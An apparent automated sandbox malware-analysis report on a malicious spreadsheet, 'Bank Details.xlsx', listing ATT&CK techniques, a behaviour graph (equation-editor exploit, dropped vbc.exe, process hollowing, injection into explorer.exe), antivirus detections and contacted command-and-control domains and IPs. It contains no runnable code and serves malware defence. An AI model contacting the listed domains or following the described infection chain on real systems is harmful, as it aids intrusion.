          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 385368 Sample: Bank Details.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 10 EQNEDT32.EXE 16 2->10         started        15 EXCEL.EXE 174 49 2->15         started        process3 dnsIp4 45 stdypmrimelimtewsosq.dns.army 103.141.138.117, 49170, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->45 47 fqe.short.gy 52.59.165.42, 443, 49167 AMAZON-02US United States 10->47 35 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 18 10->17         started        file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\e4utfxiuc.dll, PE32 17->33 dropped 57 Multi AV Scanner detection for dropped file 17->57 59 Detected unpacking (changes PE section rights) 17->59 61 Maps a DLL or memory area into another process 17->61 63 2 other signatures 17->63 21 vbc.exe 17->21         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 39 www.christlicheliebe.net 144.76.242.196, 49175, 80 HETZNER-ASDE Germany 24->39 41 www.qcmax.com 104.128.125.95, 49174, 80 HENGTONG-IDC-LLCUS United States 24->41 43 12 other IPs or domains 24->43 73 System process connects to network (likely due to code injection or exploit) 24->73 28 help.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe16%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe76%ReversingLabsWin32.Trojan.Predator
          C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll19%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll38%ReversingLabsWin32.Trojan.Predator
          C:\Users\Public\vbc.exe16%MetadefenderBrowse
          C:\Users\Public\vbc.exe76%ReversingLabsWin32.Trojan.Predator

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.help.exe.1027960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.vbc.exe.72340000.16.unpack100%AviraHEUR/AGEN.1131513Download File
          4.2.vbc.exe.2e30000.15.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.help.exe.44c4c0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.starr2021.com/aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hostvngiare.com
          		104.21.71.76
          		truetrue
            		unknown
            stdypmrimelimtewsosq.dns.army
            		103.141.138.117
            		truetrue
              		unknown
              dns.95h5cdn.com
              		18.166.77.19
              		truetrue
                		unknown
                gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com
                		3.230.51.235
                		truefalse
                  		high
                  parkingpage.namecheap.com
                  		198.54.117.212
                  		truefalse
                    		high
                    playfulpainters.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.qcmax.com
                      		104.128.125.95
                      		truetrue
                        		unknown
                        fqe.short.gy
                        		52.59.165.42
                        		truefalse
                          		unknown
                          www.christlicheliebe.net
                          		144.76.242.196
                          		truetrue
                            		unknown
                            www.thunderoffroadresort.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.18598853855.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.starr2021.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.stone-master.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.playfulpainters.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.thesixteenthround.net
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.starr2021.com/aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4Ttrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://search.ebay.de/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://www.mtv.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.rambler.ru/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://buscar.ya.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.mozilla.com0explorer.exe, 00000006.00000000.2208077400.000000000B149000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://asp.usatoday.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://rover.ebay.comexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.ebay.in/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://%s.comexplorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      http://msk.afisha.ru/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://search.rediff.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://search.naver.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.google.ru/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://search.daum.net/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://buscar.ozu.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.about.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.ask.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.cjmall.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://search.centrum.cz/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://suche.t-online.de/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.google.it/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://search.auction.co.kr/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.ceneo.pl/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.amazon.de/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://sads.myspace.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://search.sify.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://search.ebay.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://search.nifty.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.google.si/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.google.cz/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.soso.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.univision.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.ebay.it/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://busca.orange.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://investor.msn.com/vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      		high
